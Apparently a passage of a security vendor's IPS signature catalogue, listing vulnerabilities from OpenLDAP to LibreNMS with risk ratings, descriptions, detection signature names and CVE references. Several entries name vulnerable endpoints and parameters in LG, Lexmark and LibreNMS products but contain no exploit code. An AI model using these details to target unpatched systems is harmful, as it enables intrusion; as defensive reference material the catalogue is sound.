About this vulnerability: Denial of service vulnerability in OpenLDAP
Risk: Moderate
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenLDAP
Type: Malfunction
Description: OpenLDAP has a denial of service vulnerability. The vulnerability allows a remote attacker to cause a DoS by sending a crafted BIND request with a malicious CRAM-MD5 credentials string.
Situation: LDAP_OpenLDAP-LDAP-Server-BIND-Request-Denial-Of-Service
References:
CVE-2006-5779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779
BID-20939
http://www.securityfocus.com/bid/20939
Back to top

LDAP-Oracle-Internet-Directory-Pre-Authentication-LDAP-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Oracle Internet Directory
Risk: Moderate
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Oracle Application Server; Oracle Identity Manager
Type: Malfunction
Description: There is a denial of service vulnerability in Oracle Internet Directory. A remote unauthenticated attacker can send malicious bindRequest messages repeatedly in the same session to the vulnerable server to cause a denial of service condition.
Situation: LDAP_Oracle-Internet-Directory-Pre-Authentication-LDAP-Denial-Of-Service
References:
CVE-2008-2595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2595
BID-30177
http://www.securityfocus.com/bid/30177
Back to top

LDAP-Sun-Directory-Server-LDAP-DOS

About this vulnerability: Denial of service vulnerability in Sun Directory Server
Risk: Moderate
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-1296-5242
Platform: Solaris 9
Software: Sun Microsystems JavaSystem Directory Server
Type: Malfunction
Description: There exists a vulnerability in the Sun Directory Server. The flaw is caused due to improper handling of certain overly large LDAP messages. An unauthenticated remote attacker may exploit this vulnerability by sending a crafted LDAP message to the target host, which may terminate the affected LDAP server on the target system.
Situation: Generic_Sun-Directory-Server-LDAP-DOS-2
LDAP_Sun-Directory-Server-LDAP-DOS
References:
CVE-2006-0647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0647
BID-16550
http://www.securityfocus.com/bid/16550
Back to top

Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in LEAD Technologies LEADTOOLS Raster Twain
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: LEAD Technologies LEADTOOLS Raster Twain
Type: Buffer Overflow
Description: Three is a buffer overflow vulnerability in LEADTOOLS Raster Twain LtocxTwainu ActiveX control. The vulnerability is due to a boundary error while parsing the AppName parameter of the affected ActiveX control. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation of this vulnerability would result in a heap buffer overflow and allow for arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow
File-Text_Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow
Back to top

LeapWare-LeapFTP-Pasv-Reply-Buffer-Overflow

About this vulnerability: A LeapWare LeapFTP Pasv Reply Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LeapWare LeapFTP
Type: Buffer Overflow
Description: A buffer overflow vulnerability in LeapWare LeapFTP, version 2.7.3.600, which allows remote attacker to execute arbitrary code via a long IP address response to a PASV request.
Situation: FTP_SS-CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow
References:
CVE-2003-0558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0558
BID-7860
http://www.securityfocus.com/bid/7860
OSVDB-4587
http://www.osvdb.org/4587
Back to top

Legacy-Chakra-Based-Microsoft-Edge-Usage

About this vulnerability: Obsolete Edge browser usage detected
Risk: High
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Platform: Windows
Software: Microsoft Edge
Type: Browser
Description: This fingerprint detects the usage of legacy Chakra-based Microsoft Edge browsers. They were based on the Chakra JavaScript engine, which were officially replaced by the V8 engine in January 2020. Chakra-based Microsoft Edge browsers are obsolete and contain a large number of critical vulnerabilities, and thus, should not be allowed in high-security environments.
Situation: HTTP_CSH-Legacy-Chakra-Based-Microsoft-Edge-Usage
Back to top

Lethic

About this vulnerability: Lethic
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Lethic is a Botnet that is used to send spam.
Situation: HTTP_CS-Lethic-Activity
Generic_CS-Lethic-Activity
File-Text_Lethic-Activity
Back to top

Lets-Encrypt-Signed-Certificate

About this vulnerability: Certificate signed by Let's Encrypt
Risk: Low
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic browser
Type: Insecure Configuration
Description: Let's encrypt is a free certificate authority trusted by most modern browsers. As fully automated and free service, this can sometimes be used for encrypted malware delivery.
Situation: HTTPS_SS-Lets-Encrypt-Signed-Certificate
Back to top

Lexmark-Device-Embedded-Web-Server-RCE

About this vulnerability: An attempt to exploit a vulnerability in a Lexmark device detected
Risk: High
First detected in: sgpkg-ips-1659-5242
Last changed: sgpkg-ips-1659-5242
Platform: Unix
Software: Lexmark
Type: Input Validation
Description: A vulnerability in the embedded webserver in certain Lexmark devices through 2023-02-19 which allows remote attackers to execute arbitrary code via several configurable parameters on the page, including FT_Custom_lbtrace, due to insufficient input validation.
Situation: HTTP_CRL-Lexmark-Device-Embedded-Web-Server-RCE
References:
CVE-2023-26067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26067
Back to top

Lexmark-Markvision-Enterprise-Libraryfileuploadservlet-Directory-Traversal

About this vulnerability: A vulnerability in Lexmark MarkVision Enterprise
Risk: High
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Lexmark MarkVision Enterprise
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Lexmark Markvision Enterprise. The vulnerability is due to insufficient input validation in LibraryFileUploadServlet when processing zip files. A remote, unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Zip_Lexmark-Markvision-Enterprise-Libraryfileuploadservlet-Directory-Traversal
References:
CVE-2014-9375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9375
Back to top

Lexmark-Markvision-Enterprise-Remote-Code-Execution

About this vulnerability: A Lexmark Markvision Enterprise Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lexmark MarkVision Enterprise
Type: Input Validation
Description: A vulnerability in Lexmark MarkVision Enterprise, versions before 2.1, which allow remote attackers to execute arbitrary code due to the insufficient sanitization of user input.
Situation: HTTP_CSH-Lexmark-Markvision-Enterprise-Remote-Code-Execution
References:
CVE-2014-8741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8741
Back to top

LG-LED-Assistant-API-Changepw-Unverified-Password-Reset

About this vulnerability: A vulnerability in LG LED Assistant
Risk: High
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Platform: Generic
Software: LG LED Assistant
Type: Malfunction
Description: An unverified password reset vulnerability has been reported for LG LED Assistant. This vulnerability is due to the design weakness in the API changePw endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary password reset without any verification.
Situation: HTTP_CSH-LG-LED-Assistant-API-Changepw-Unverified-Password-Reset
References:
CVE-2024-2862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2862
Back to top

LG-LED-Assistant-API-Thumbnail-Directory-Traversal

About this vulnerability: A vulnerability in LG LED Assistant
Risk: High
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: LG LED Assistant
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported for LG LED Assistant. This vulnerability is due to lack of sanitation on the upload file name in the API thumbnail endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file write and, in the worst case, remote code execution in the context of the current user.
Situation: HTTP_CRL-LG-LED-Assistant-Setthumbnailrc-Directory-Traversal
References:
CVE-2024-2863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2863
Back to top

LG-LED-Assistant-Setthumbnailrc-Directory-Traversal

About this vulnerability: A vulnerability in LG LED Assistant
Risk: High
First detected in: sgpkg-ips-1705-5242
Last changed: sgpkg-ips-1705-5242
Platform: Generic
Software: LG LED Assistant
Type: Directory Traversal
Description: A remote code execution vulnerability has been reported for LG LED Assistant. This vulnerability is due to a directory traversal in the setThumbnailRc endpoint. Successfully exploiting this vulnerability could result in arbitrary creation of file or, in the worst case, remote code execution in the context of the current user.
Situation: HTTP_CRL-LG-LED-Assistant-Setthumbnailrc-Directory-Traversal
Back to top

LG-LED-Assistant-Updatefile-Directory-Traversal

About this vulnerability: A vulnerability in LG LED Assistant
Risk: High
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Platform: Generic
Software: LG LED Assistant
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in LG LED Assistant due to improper validation of user data sent to "/api/download/updateFile" endpoint. A remote unauthenticated attacker could exploit this vulnerability by a sending crafted request to the target server. Successful exploitation could result in information disclosure in the context of the current user.
Situation: HTTP_CSU-LG-LED-Assistant-Updatefile-Directory-Traversal
Back to top

LG-LED-Assistant-Upload-Directory-Traversal

About this vulnerability: A vulnerability in LG LED Assistant
Risk: High
First detected in: sgpkg-ips-1670-5242
Last changed: sgpkg-ips-1670-5242
Platform: Generic
Software: LG LED Assistant
Type: Directory Traversal
Description: Directory traversal vulnerabilities have been reported in LG LED Assistant. The vulnerabilities are due to improper validation of user data sent to "/api/settings/upload" endpoint. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary write access to the server which, in the worst case, can be utilized to achieve arbitrary code execution under the security context of the application.
Situation: HTTP_CSU-LG-LED-Assistant-Upload-Directory-Traversal
Back to top

LG-N1A1-NAS-Remote-Command-Execution-CVE-2018-14839

About this vulnerability: An attempt to exploit a vulnerability in LG N1A1 NAS detected
Risk: High
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1627-5242
Platform: Generic
Software: LG N1A1 NAS
Type: Input Validation
Description: LG N1A1 NAS 3718.510 is affected by a remote command execution vulnerability, which could be exploited by sending HTTP POST requests with malicious parameters to various endpoints of the device.
Situation: HTTP_CRL-LG-N1A1-NAS-Remote-Command-Execution-CVE-2018-14839
References:
CVE-2018-14839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14839
Back to top

LG-Simple-Editor-Command-Injection-CVE-2023-40504

About this vulnerability: An attempt to exploit a vulnerability in LG Simple Editor detected
Risk: High
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Platform: Windows
Software: LG Simple Editor
Type: Input Validation
Description: A vulnerability in LG Simple Editor, versions 3.21.0 and before, which allows remote attackers to execute arbitrary commands through the readVideoInfo method, due to improper validation of user input.
Situation: HTTP_CRL-LG-Simple-Editor-Command-Injection-CVE-2023-40504
References:
CVE-2023-40504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40504
Back to top

LG-Simple-Editor-Copystickercontent-Directory-Traversal

About this vulnerability: A vulnerability in LG Simple Editor
Risk: High
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Platform: Generic
Software: LG Simple Editor
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in LG Simple Editor. This vulnerability is due to improper input validation when handling the copyStickerContent command. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in sensitive information disclosure and overwriting of arbitrary files in the context of SYSTEM. The vendor, LG, has not addressed this vulnerability.
Situation: File-Text_LG-Simple-Editor-Copystickercontent-Directory-Traversal
References:
CVE-2023-40496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40496
Back to top

LG-Simple-Editor-Copytemplateall-Directory-Traversal

About this vulnerability: A vulnerability in LG Simple Editor
Risk: Moderate
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1654-5242
Platform: Generic
Software: LG Simple Editor
Type: Directory Traversal
Description: Improper input validation in the copyTemplateAll method causes a directory traversal vulnerability in LG Simple Editor. A successful exploit allows an attacker to cause a denial of service condition or an information disclosure.
Situation: File-Text_LG-Simple-Editor-Copytemplateall-Directory-Traversal
References:
CVE-2023-40495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40495
Back to top

LG-Simple-Editor-Cropimage-Directory-Traversal

About this vulnerability: A vulnerability in LG Simple Editor
Risk: Moderate
First detected in: sgpkg-ips-1647-5242
Last changed: sgpkg-ips-1647-5242
Platform: Generic
Software: LG Simple Editor
Type: Directory Traversal
Description: Improper input validation in the cropImage command causes a directory traversal vulnerability in LG Simple Editor. A successful exploit allows an attacker to delete arbitrary files on the target system.
Situation: HTTP_CRL-LG-Simple-Editor-Cropimage-Directory-Traversal
References:
CVE-2023-40502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40502
Back to top

LG-Simple-Editor-Deletechecksession-Directory-Traversal

About this vulnerability: A vulnerability in LG Simple Editor
Risk: High
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: LG Simple Editor
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in LG Simple Editor. This vulnerability is due to improper input validation in the deleteCheckSession method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary deletion of files or, in the worst case, denial of service.
Situation: HTTP_CS-LG-Simple-Editor-Deletechecksession-Directory-Traversal
References:
CVE-2023-40492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40492
Back to top

LG-Simple-Editor-Deletefolder-Directory-Traversal

About this vulnerability: A vulnerability in LG Simple Editor
Risk: High
First detected in: sgpkg-ips-1638-5242
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: LG Simple Editor
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in LG Simple Editor. This vulnerability is due to improper input validation in the deleteFolder method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in deleting arbitrary files in the context of SYSTEM.
Situation: HTTP_CS-LG-Simple-Editor-Deletefolder-Directory-Traversal
References:
CVE-2023-40494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40494
Back to top

LG-Simple-Editor-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in LG Simple Editor detected
Risk: High
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Windows
Software: LG Simple Editor
Type: Malfunction
Description: A vulnerability in LG Simple Editor, 3.21 and before, which allows remote attackers to upload and execute a malicious JSP file with the SYSTEM user permissions.
Situation: HTTP_CS-LG-Simple-Editor-Remote-Code-Execution
References:
CVE-2023-40498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40498
Back to top

LG-Simple-Editor-Savexml-Directory-Traversal

About this vulnerability: A vulnerability in LG Simple Editor
Risk: High
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Platform: Generic
Software: LG Simple Editor
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in LG Simple Editor. This vulnerability is due to improper input validation in the saveXml command. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result remote code execution in the context of SYSTEM.
Situation: File-Text_LG-Simple-Editor-Savexml-Directory-Traversal
References:
CVE-2023-40497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40497
Back to top

Lianja-SQL-DbNetserver-Stack-Buffer-Overflow

About this vulnerability: A stack buffer overflow vulnerability in Lianja SQL Server
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lianja SQL Server
Type: Buffer Overflow
Description: A vulnerability in Lianja SQL Servers before version 1.0.0 RC 5.2 allows an attacker to cause denial of service or possible code execution in target machine.
Situation: Generic_CS-Lianja-SQL-DbNetserver-Stack-Buffer-Overflow
References:
CVE-2013-3563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3563
OSVDB-93759
http://www.osvdb.org/93759
Back to top

Libav-LZO-Integer-Overflow

About this vulnerability: A vulnerability in Libav Team libav
Risk: Moderate
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libav
Type: Integer Overflow
Description: A code execution vulnerability exists in the libav library. The vulnerability is due to an integer overflow while processing literal runs in the LZO compressed data. A remote unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted file with an application using affected libraries. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Binary_Libav-LZO-Integer-Overflow
References:
CVE-2014-4609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4609
BID-68217
http://www.securityfocus.com/bid/68217
OSVDB-108490
http://www.osvdb.org/108490
Back to top

Libcue-Out-Of-Bounds-Array-Access-CVE-2023-43641

About this vulnerability: A vulnerability in Libcue
Risk: High
First detected in: sgpkg-ips-1639-5242
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: libcue
Type: Input Validation
Description: An out-of-bounds array access vulnerability has been reported in libcue 2.2.1 and earlier. An attacker can exploit this vulnerability by enticing a user to download a maliciously crafted cue sheet. On GNOME desktop environments this may lead to remote command execution.
Situation: File-Text_Libcue-Out-Of-Bounds-Array-Access-CVE-2023-43641
References:
CVE-2023-43641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43641
Back to top

Libflac-Picture-Metadata-Picture-Description-Size-Buffer-Overflow

About this vulnerability: A vulnerability in FLAC Project libFLAC
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libflac
Type: Buffer Overflow
Description: A heap memory overflow vulnerability exists in the Free Lossless Audio Codec (FLAC) library embedded and used by various products. The vulnerability is due to boundary errors when processing FLAC audio files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted FLAC audio file. Successful exploitation may lead to arbitrary code execution in the security context of the affected application, normally using the privileges of the logged in user. In a attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. In an attack case where code injection is not successful, the application that processes the malicious FLAC file will terminate abnormally.
Situation: File-Binary_Libflac-Picture-Metadata-Picture-Description-Size-Buffer-Overflow
References:
CVE-2007-4619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4619
BID-26042
http://www.securityfocus.com/bid/26042
Back to top

Libmspack-Project-Cabd_Sys_Read_Block-Off-By-One

About this vulnerability: A vulnerability in the libmspack library
Risk: Moderate
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libmspack; cabextract
Type: Malfunction
Description: An off-by-one vulnerability has been reported in the libmspack library. A remote attacker could exploit this vulnerability by enticing a target user to open an malicious crafted CAB file with an application that uses vulnerable library. Successful exploitation of the vulnerability may result in arbitrary code execution under the security context of the user.
Situation: File-Binary_Libmspack-Project-Cabd_Sys_Read_Block-Off-By-One
References:
CVE-2018-18584
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18584
Back to top

Libpng-Library-tRNS-sBIT-hIST-Chunk-Handling-BOF

About this vulnerability: Multiple buffer overflows in libpng graphics library
Risk: High
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Buffer Overflow
Description: Libpng graphics library contains multiple buffer overflows: the png_handle_tRNS function does not properly validate the length of transparency chunk (tRNS) dataand the png_handle_sBIT and png_handle_hIST functions do not perform sufficient bounds checking. A remote attacker could create malformed PNG image to execute arbitrary code on the system once the image file is opened by the victim. MSN Messenger and Windows Messenger are also affected by this vulnerability as reported in MS05-009.
Situation: HTTP_SS-Libpng-PNG-Image-BOF
Generic_MS-Messenger-PNG-Image-BOF-MS05-009
File-PNG_Libpng-PNG-Image-BOF
References:
CVE-2004-0597
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0597
BID-10857
http://www.securityfocus.com/bid/10857
BID-12506
http://www.securityfocus.com/bid/12506
OSVDB-8312
http://www.osvdb.org/8312
OSVDB-8326
http://www.osvdb.org/8326
MS05-009
http://technet.microsoft.com/security/bulletin/MS05-009
Back to top

Libpng-PNG-Decompress-Chunk-Integer-Overflow

About this vulnerability: A vulnerability in PNG Development Group libpng
Risk: Moderate
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libpng
Type: Integer Overflow
Description: A heap buffer overflow vulnerability has been reported in libpng. The vulnerability is due to an integer overflow error leading to overly small heap allocation in the function png_decompress_chunk(). An unauthenticated, remote attacker can exploit this vulnerability by enticing a target user to open a crafted PNG file with an application that uses a vulnerable version of libpng, or submitting a malicious PNG to the server that utilizes the vulnerable library. Any injected code would run with the privileges of the affected application or service.
Situation: HTTP_CS-Libpng-PNG-Decompress-Chunk-Integer-Overflow
File-PNG_Libpng-PNG-Decompress-Chunk-Integer-Overflow
References:
CVE-2011-3026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3026
OSVDB-79294
http://www.osvdb.org/79294
Back to top

Libpng-PNG-Inflate-Buffer-Overflow

About this vulnerability: A vulnerability in PNG Development Group libpng
Risk: High
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-1844-5242
Platform: Generic
Software: libpng
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been identified in libpng. The vulnerability is due to a type conversion flaw in the code that performs expansion of certain iCCP, iTXt, and zTXt PNG image file chunks. An unauthenticated, remote attacker can exploit this vulnerability by enticing a target user to open a crafted PNG file with an application that uses a vulnerable version of libpng, or submitting a malicious PNG to the server that utilizes the vulnerable library. Any injected code would run with the privileges of the affected application or service.
Situation: HTTP_CS-Libpng-PNG-Decompress-Chunk-Integer-Overflow
File-PNG_Libpng-PNG-Decompress-Chunk-Integer-Overflow
References:
CVE-2011-3045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3045
BID-52453
http://www.securityfocus.com/bid/52453
Back to top

LibreNMS-Aboutcontroller.php-Command-Injection

About this vulnerability: A vulnerability in LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1810-5242
Last changed: sgpkg-ips-1810-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: Improper validation of a configuration value when on the AboutController.php page causes a command injection vulnerability in LibreNMS. A successful exploitation allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-LibreNMS-Aboutcontroller-Command-Injection
References:
CVE-2024-51092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51092
Back to top

LibreNMS-addhost-Command-Injection

About this vulnerability: A vulnerability in LibreNMS
Risk: High
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: LibreNMS
Type: Input Validation
Description: A vulnerability in LibreNMS, version 1.46, which allows remote attackers to execute arbitrary code do to insufficient user input validation of the community parameter in a POST request to /addhost.
Situation: HTTP_CSU-LibreNMS-addhost-Command-Injection
References:
CVE-2018-20434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20434
Back to top

LibreNMS-Address-Search-Address-SQL-Injection

About this vulnerability: A vulnerability in LibreNMS LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1696-5242
Last changed: sgpkg-ips-1696-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: Improper validation of request parameters in the address-search.inc.php module causes an SQL injection vulnerability in LibreNMS. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-LibreNMS-Address-Search-Address-SQL-Injection
References:
CVE-2023-5591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5591
Back to top

LibreNMS-Alert-Rule-Name-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: Improper input validation in the Alert Rules page causes a cross-site scripting vulnerability in LireNMS. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-LibreNMS-Alert-Rule-Name-Stored-Cross-Site-Scripting
References:
CVE-2024-47525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47525
Back to top

LibreNMS-API-Token-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: Improper validation of user input when adding an API token causes a cross-site scripting vulnerability in LibreNMS. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-LibreNMS-API-Token-Stored-Cross-Site-Scripting
References:
CVE-2024-49754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49754
Back to top

LibreNMS-API_Functions-List_Devices-Order-SQL-Injection

About this vulnerability: A vulnerability in LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: Improper validation of the order parameter in the request in api_functions.inc.php module causes an SQL injection vulnerability in LibreNMS. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-LibreNMS-API_Functions-List_Devices-Order-SQL-Injection
References:
CVE-2024-32480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32480
Back to top

LibreNMS-Authenticated-Command-Injection-CVE-2024-51092

About this vulnerability: An attempt to exploit a vulnerability in LibreNMS detected
Risk: High
First detected in: sgpkg-ips-1810-5242
Last changed: sgpkg-ips-1810-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: An authenticated attacker can create dangerous directory names on the LibreNMS system and alter sensitive configuration parameters through the web portal. Those two defects combined then allows to inject arbitrary OS commands inside "shell_exec()" calls, thus achieving arbitrary code execution.
Situation: HTTP_CRL-LibreNMS-Authenticated-Command-Injection-CVE-2024-51092
References:
CVE-2024-51092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51092
Back to top

LibreNMS-Bills-Information-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS
Risk: High
First detected in: sgpkg-ips-1589-5242
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation in Bills modules on several parameters in the request. A remote attacker could exploit the vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in execution of arbitrary script code in the victim's browser.
Situation: HTTP_CRL-LibreNMS-Bills-Information-Stored-Cross-Site-Scripting
References:
CVE-2022-3562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3562
Back to top

LibreNMS-Collectd-Command-Injection

About this vulnerability: A vulnerability in LibreNMS
Risk: High
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: LibreNMS
Type: Malfunction
Description: There exists a command injection vulnerability in LibreNMS. Succesful exploitation could lead in arbitrary code execution.
Situation: HTTP_CSU-LibreNMS-Collectd-Command-Injection
References:
CVE-2019-10669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10669
Back to top

LibreNMS-Device-Display-Name-Stored-Cross-Site-Scripting-CVE-2024-53457

About this vulnerability: A vulnerability in LibreNMS
Risk: High
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in LibreNMS. The vulnerability is due to improper validation of user input when configuring a device with a display name. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-LibreNMS-Device-Display-Name-Stored-Cross-Site-Scripting-CVE-2024-53457
References:
CVE-2024-53457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53457
Back to top

LibreNMS-Device-Misc-Dynamic_Override_Config-Stored-XSS-CVE-2025-23200

About this vulnerability: A vulnerability in LibreNMS LibreNMS
Risk: Moderate
First detected in: sgpkg-ips-1854-5242
Last changed: sgpkg-ips-1854-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
Description: Improper validation of user input when configuring the Misc settings of a device causes a cross-site scripting vulnerability in LibreNMS. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-LibreNMS-Device-Misc-Dynamic_Override_Config-Stored-Cross-Site-Scripting-CVE-2025-23200
References:
CVE-2025-23200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-23200
Back to top

LibreNMS-Device-Overview-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in LibreNMS
Risk: High
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: LibreNMS
Type: Input Validation
